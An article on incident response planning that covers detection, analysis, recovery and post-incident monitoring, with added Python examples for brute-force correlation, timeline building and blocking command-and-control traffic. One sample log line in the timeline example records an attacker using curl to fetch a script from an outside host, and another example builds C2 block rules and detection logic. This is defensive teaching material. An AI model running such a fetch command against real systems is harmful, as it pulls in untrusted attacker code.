Every organization must be prepared for the worst. The key to handling an incident is preparation beforehand: knowing how to recognize the start of an incident, how to recover, and how to return to normal operations, and having established security policies in place. These include, but are not limited to, warning banners, documented user privacy expectations, an incident notification process, an incident containment policy, incident handling checklists, a current corporate disaster recovery plan, and a functioning, active security risk assessment process.
Pre-deployed incident handling assets also need consideration, since they are what protects systems and preserves evidence while a breach is under way. This includes monitoring your own sensors, probes, and monitors on critical systems, keeping track of the databases in core systems, and maintaining active audit logs for all server and network components. Logging that is switched on after the breach cannot show how the attacker got in.
“With a successful incident response program, damage can be mitigated or avoided altogether,” Morales says.
Many security providers offer an incident response retainer: a pre-arranged contract under which an external team handles a cyber security incident or data breach quickly and effectively, with the engagement terms agreed before anything happens.
“Enterprise architecture and systems engineering must be based on the assumption that systems or components have either been compromised or contain undiscovered vulnerabilities that could lead to undetected compromises. Additionally, missions and business functions must continue to operate in the presence of compromise.”
The capabilities of an IR program are often measured by the organization's maturity level, which reflects how proactive the organization is. Companies that can map their policies to the level of risk appropriate to the business are better prepared when a security incident occurs.
Incident Response planning system
- Incident response planning: Preparation is the key to effective incident response. Even the best incident response team cannot effectively address an incident without predetermined guidelines. A strong plan must be in place to support the working team. To successfully address security events, an incident response plan must include the following:
Develop and Document Incident Response Policies: Establish the policies, procedures, and agreements (including those with external providers) that govern incident response management.
Define Communication Guidelines: Create communication standards and guidelines, including an out-of-band channel for use if corporate email or chat is itself compromised, so the team can communicate during and after an incident.
Conduct Threat Hunting Exercises: Run operational threat hunting exercises to look for incidents already occurring within your environment. This makes incident response more proactive.
Assess Threat Detection Capability: Assess your current threat detection capability and update your risk assessment and improvement programs accordingly.
- Incident detection: This phase is also known as the discovery phase. Its focus is monitoring security events in order to detect, alert on, and report potential security incidents.
Monitor: Monitor security events in your environment using sources such as firewalls, intrusion prevention systems, data loss prevention tools, and endpoint and authentication logs.
Detect: Detect potential security incidents by correlating alerts and events within a SIEM solution. A single failed login is noise; a burst of failures followed by a success from the same source is an alert.
Alert: Analysts create an incident ticket, document initial findings, and assign an initial incident classification and severity.
Report: Your reporting process should accommodate regulatory reporting obligations and escalation paths, including any notification deadlines that apply to the organization.
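The Detect and Alert steps above, as an added example that is not part of the original article: a small correlation rule of the kind a SIEM would run, turning raw authentication events into a classified incident ticket. The log format, field names, thresholds and sample events are all assumptions constructed for illustration.

```python
"""Added example (not from the original article): turning raw authentication
events into a classified incident ticket the way a SIEM correlation rule would.
The log format, field names, thresholds and sample events are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events, one per line:
# "<UTC timestamp> <host> sshd: <Failed|Accepted> password for <user> from <ip>"
SAMPLE_LOG = """\
2024-03-01T09:00:01Z web01 sshd: Failed password for admin from 203.0.113.7
2024-03-01T09:00:03Z web01 sshd: Failed password for admin from 203.0.113.7
2024-03-01T09:00:04Z web01 sshd: Failed password for root from 203.0.113.7
2024-03-01T09:00:06Z web01 sshd: Failed password for admin from 203.0.113.7
2024-03-01T09:00:08Z web01 sshd: Failed password for admin from 203.0.113.7
2024-03-01T09:00:15Z web01 sshd: Accepted password for admin from 203.0.113.7
2024-03-01T09:05:00Z web02 sshd: Failed password for alice from 198.51.100.9
2024-03-01T09:30:00Z web02 sshd: Accepted password for alice from 198.51.100.9
"""

FAIL_THRESHOLD = 5             # failures inside WINDOW that open a ticket (assumed)
WINDOW = timedelta(minutes=2)  # sliding correlation window (assumed)


def parse(line):
    """Split one constructed log line into its fields."""
    ts, host, _, outcome, _, _, user, _, ip = line.split()
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "host": host, "outcome": outcome, "user": user, "ip": ip}


def correlate(log_text):
    """Return one ticket per (host, source ip) that reaches FAIL_THRESHOLD
    failures inside WINDOW. A success from the same source while the window is
    still hot escalates the ticket: that pattern is a likely compromise, not
    just noise, and the ticket carries the evidence an analyst needs."""
    events = sorted((parse(l) for l in log_text.splitlines() if l.strip()),
                    key=lambda e: e["ts"])
    failures = defaultdict(list)  # (host, ip) -> failure times still in window
    tickets = {}                  # (host, ip) -> ticket
    for e in events:
        key = (e["host"], e["ip"])
        recent = [t for t in failures[key] if e["ts"] - t <= WINDOW]
        if e["outcome"] == "Failed":
            recent.append(e["ts"])
            if len(recent) >= FAIL_THRESHOLD and key not in tickets:
                tickets[key] = {
                    "host": e["host"], "source_ip": e["ip"],
                    "classification": "brute force attempt", "severity": "medium",
                    "first_seen": recent[0].isoformat(),
                    "failed_attempts": len(recent),
                }
        elif e["outcome"] == "Accepted" and len(recent) >= FAIL_THRESHOLD:
            # Success right after a burst of failures: escalate rather than
            # letting the single "Accepted" line pass as a normal login.
            # The ticket exists, because the threshold was reached on a failure
            # that fell inside this same window.
            tickets[key].update(classification="possible account compromise",
                                severity="high", compromised_user=e["user"],
                                success_at=e["ts"].isoformat())
        failures[key] = recent
    return list(tickets.values())


if __name__ == "__main__":
    for ticket in correlate(SAMPLE_LOG):
        print(ticket)
```

Run stand-alone, the block prints one high-severity ticket for 203.0.113.7 against web01 and nothing for web02, whose single failure and later success are 25 minutes apart and fall outside the window.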
- Remediation: The bulk of the effort in properly scoping and understanding the security incident takes place during this step, which is why it is also referred to as the analysis phase. Resources should be used to collect data from tools and systems for further analysis and to identify indicators of compromise. Analysts need in-depth skills and a detailed understanding of live system response, digital forensics, memory analysis, and malware analysis. As evidence is collected, analysts should focus on three primary areas:
2. Determine what tracks the threat actor may have left behind.
3. Gather the artifacts needed to build a timeline of activities.
Analysis tools and techniques that can be brought to bear include:
Binary Analysis: Investigate malicious binaries or tools used by the attacker and document what those programs do. This analysis is performed in two ways:
Behavioral Analysis: Execute the malicious program in an isolated VM or sandbox with no route to the production network and observe its behavior (files written, processes spawned, network connections attempted). Be aware that some malware detects virtualization and changes its behavior.
Static Analysis: Reverse engineer the malicious program without running it to determine its full functionality, including code paths a sandbox run may never have triggered.
Enterprise Hunting: Analyze existing systems and event log technologies across the estate to determine the scope of the compromise, searching for the indicators found on the first compromised host.
Packet and Traffic Reconstructors: Often bundled with a network traffic monitor, these tools reassemble sessions and files from captured packets, giving a static picture of the network and the traffic that crossed it at the time of the incident, including what the attacker transferred. They only help if packet capture was in place before the incident.
Traceroute and Whois Tools: These help trace the network path to an intruder's source address and identify its registered owner and hosting provider. The address is frequently a compromised host, VPN exit or proxy rather than the attacker's own machine, so treat it as a lead for abuse reports and blocking rather than as attribution.
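The third evidence area above, the timeline, as an added example that is not part of the original article: artifacts from a Linux syslog, an Apache access log and an exported Windows event are normalized to UTC and ordered. Syslog lines carry no year and no zone, and a Windows event export typically carries local time, so the per-host UTC offsets recorded during evidence collection are needed to put them on one clock. The log lines, host names and offsets are constructed for illustration.

```python
"""Added example (not from the original article): merging artifacts from hosts
in different time zones into one UTC-ordered timeline. The log lines, host
names and per-host time zones are constructed for illustration."""
import re
from datetime import datetime, timedelta, timezone

CASE_YEAR = 2024  # syslog lines carry no year; taken from the case (assumed)
# UTC offsets in hours recorded from each host's configuration during
# evidence collection (assumed). Syslog and exported Windows events carry no
# zone, so this mapping is the only way to put them on a common clock.
HOST_TZ = {"web01": 1, "dc01": -5}

SYSLOG = """\
Mar  1 09:00:15 web01 sshd[2231]: Accepted password for admin from 203.0.113.7 port 51422 ssh2
Mar  1 09:01:40 web01 sudo: admin : TTY=pts/0 ; COMMAND=/usr/bin/curl http://203.0.113.7/x.sh
"""
ACCESS_LOG = """\
203.0.113.7 - - [01/Mar/2024:09:02:10 +0100] "GET /admin/export HTTP/1.1" 200 48211
"""
WIN_EVENTS = [  # fields as exported from a Windows event log, local time (constructed)
    {"TimeCreated": "2024-03-01T03:03:30", "Computer": "dc01", "EventID": 4624,
     "Message": "An account was successfully logged on: admin from 10.0.0.14"},
]

MONTHS = {m: i for i, m in enumerate(
    "Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(), start=1)}


def host_zone(host):
    return timezone(timedelta(hours=HOST_TZ[host]))


def from_syslog(line):
    m = re.match(r"(\w{3})\s+(\d+) (\d\d):(\d\d):(\d\d) (\S+) (.*)", line)
    mon, day, hh, mm, ss, host, msg = m.groups()
    local = datetime(CASE_YEAR, MONTHS[mon], int(day), int(hh), int(mm), int(ss),
                     tzinfo=host_zone(host))
    return (local.astimezone(timezone.utc), host, "syslog", msg)


def from_access_log(line, host="web01"):
    # Apache's combined format carries the offset itself, so no lookup is needed.
    m = re.match(r'(\S+) .*?\[([^\]]+)\] "([^"]*)" (\d{3})', line)
    ip, ts, request, status = m.groups()
    t = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return (t.astimezone(timezone.utc), host, "access_log", f"{ip} {request} -> {status}")


def from_windows(ev):
    local = datetime.fromisoformat(ev["TimeCreated"]).replace(tzinfo=host_zone(ev["Computer"]))
    return (local.astimezone(timezone.utc), ev["Computer"],
            f"EventID {ev['EventID']}", ev["Message"])


def build_timeline():
    """Normalize every artifact to UTC and order it; returns (utc, host, source, text)."""
    events = [from_syslog(l) for l in SYSLOG.splitlines() if l.strip()]
    events += [from_access_log(l) for l in ACCESS_LOG.splitlines() if l.strip()]
    events += [from_windows(e) for e in WIN_EVENTS]
    return sorted(events, key=lambda e: e[0])


def render(events):
    return "\n".join(f"{t:%Y-%m-%dT%H:%M:%SZ} {host:<5} {src:<12} {text}"
                     for t, host, src, text in events)


if __name__ == "__main__":
    print(render(build_timeline()))
```

Sorted on the raw local timestamps, the domain controller logon (03:03) would appear to precede the SSH login on web01 (09:00); on a common clock it is the last step of the chain, which is the kind of ordering error that sends an investigation after the wrong initial host.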
- Recovery: This is one of the most critical stages of incident response. The recovery strategy is based on the intelligence and indicators of compromise gathered during the analysis phase. After systems are restored and their security is verified, normal operations can resume.
Coordinated Shutdown: Once all systems compromised by the threat actor have been identified, perform a coordinated shutdown of those devices, so the attacker cannot react to a piecemeal response by moving to a host that has not yet been touched. Notify all IR team members in advance to ensure proper timing, and capture volatile evidence such as memory images before powering off, since shutdown destroys it.
Wipe and Rebuild: Wipe the infected devices and rebuild the operating system from known-good media. Change the passwords of all compromised accounts and rotate any keys, tokens, or service credentials the attacker could have reached.
Threat Mitigation Requests: If you have identified domains or IP addresses used by the threat actor for command and control, issue threat mitigation requests to block communication with them on all egress channels (firewalls, web proxies, and DNS resolvers), and make sure the blocks are logged rather than silently dropped.
- Restoration: There is more work to be done after the incident is resolved. Be sure to properly document any information that can be used to prevent similar occurrences in the future.
Incident Report Completion: Documenting the incident helps improve the incident response plan and justifies additional security measures to avoid such incidents in the future.
Monitor Post-Incident: Closely monitor activity after the incident, since threat actors often come back. Have an analyst watch SIEM data for any of the indicators associated with the prior incident. A blocked connection to a known command-and-control address is not a non-event: it means a host is still infected or was missed during cleanup.
Identify preventative measures: Create new security initiatives to prevent future incidents.
Gain Cross-Functional Buy-In: Coordinating across the organization is critical to the proper implementation of new security initiatives.
Having an IR plan in place is a critical part of a successful security program. Its purpose is to establish and test clear measures that an organization should take to reduce the impact of a breach from external and internal threats.
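The threat mitigation requests in the Recovery section and the post-incident monitoring above, as one added example that is not part of the original article: the command-and-control indicators gathered during analysis are turned into logged egress blocks, and DNS and proxy logs from after the cleanup are checked for any internal host that still reaches for them. The indicator set, log formats and log lines are constructed for illustration; the iptables and Unbound local-zone syntax is real, but where the rules are applied is an assumption about the environment.

```python
"""Added example (not from the original article): turning command-and-control
indicators gathered during analysis into logged egress blocks, and watching
DNS and proxy logs after the incident for any host that still tries to reach
them. Indicators and log lines are constructed; the log formats are assumed."""
import ipaddress

# Constructed indicator set as it would come out of the analysis phase.
IOCS = {
    "domains": {"update-cdn-status.example", "cdn-metrics.example"},
    "ips": {"203.0.113.7", "198.51.100.0/24"},
}


def egress_rules(iocs):
    """Emit blocking rules: iptables OUTPUT rules that LOG before they DROP
    (the log entry is what later reveals a still-infected host) and Unbound
    local-zone lines that sinkhole each C2 domain and its subdomains."""
    rules = []
    for net in sorted(ipaddress.ip_network(x, strict=False) for x in iocs["ips"]):
        rules.append(f'iptables -A OUTPUT -d {net} -j LOG --log-prefix "IR-C2 "')
        rules.append(f"iptables -A OUTPUT -d {net} -j DROP")
    for d in sorted(iocs["domains"]):
        rules.append(f'local-zone: "{d}" always_nxdomain')
    return rules


def _domain_hit(name, domains):
    """Match the domain itself or any subdomain (beacon.<c2> is still <c2>)."""
    name = name.rstrip(".").lower()
    return any(name == d or name.endswith("." + d) for d in domains)


def _ip_hit(addr, nets):
    try:
        return any(ipaddress.ip_address(addr) in n for n in nets)
    except ValueError:  # a hostname, not an IP literal: no network match
        return False


def _target_host(target):
    """'http://h/p', 'h:443' or 'h' -> 'h' (IPv4 and hostnames only; assumed)."""
    host = target.split("://", 1)[-1].split("/", 1)[0]
    return host.rsplit(":", 1)[0] if ":" in host else host


# Constructed post-incident logs.
# DNS:   "<ts> <resolver> query <client ip> <qname> <qtype>"
DNS_LOG = """\
2024-03-03T10:00:01Z resolver query 10.0.0.21 update-cdn-status.example A
2024-03-03T10:00:02Z resolver query 10.0.0.21 www.example.org A
2024-03-03T10:00:03Z resolver query 10.0.0.44 beacon.cdn-metrics.example A
"""
# Proxy: "<ts> proxy <client ip> <method> <target> <result>"
PROXY_LOG = """\
2024-03-03T10:00:05Z proxy 10.0.0.21 CONNECT 198.51.100.77:443 denied
2024-03-03T10:01:00Z proxy 10.0.0.30 GET http://www.example.org/ 200
"""


def watch(iocs, dns_log, proxy_log):
    """Return every log line that touches an indicator. A denied proxy CONNECT
    still counts: the block did its job, but the client is still beaconing."""
    nets = [ipaddress.ip_network(x, strict=False) for x in iocs["ips"]]
    hits = []
    for line in dns_log.splitlines():
        if not line.strip():
            continue
        ts, _, _, client, qname, _ = line.split()
        if _domain_hit(qname, iocs["domains"]):
            hits.append({"ts": ts, "client": client, "indicator": qname, "source": "dns"})
    for line in proxy_log.splitlines():
        if not line.strip():
            continue
        ts, _, client, _, target, result = line.split()
        host = _target_host(target)
        if _domain_hit(host, iocs["domains"]) or _ip_hit(host, nets):
            hits.append({"ts": ts, "client": client, "indicator": host,
                         "source": "proxy", "result": result})
    return hits


def hosts_to_reimage(hits):
    """Clients that reached for an indicator after cleanup were missed or reinfected."""
    return sorted({h["client"] for h in hits})


if __name__ == "__main__":
    print("\n".join(egress_rules(IOCS)))
    found = watch(IOCS, DNS_LOG, PROXY_LOG)
    print(found)
    print("re-image:", hosts_to_reimage(found))
```

Run stand-alone, the block prints the rule set, three hits, and two internal hosts (10.0.0.21 and 10.0.0.44) that must go back through containment: one resolved a C2 domain and then had a connection to a C2 subnet denied at the proxy, the other queried a subdomain of a C2 domain, which a plain string-equality match would have missed.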
“While not every attack can be prevented, an organization’s IR stance should emphasize anticipation, agility, and adaptation”, says Chris Morales, head of security analytics at Vectra.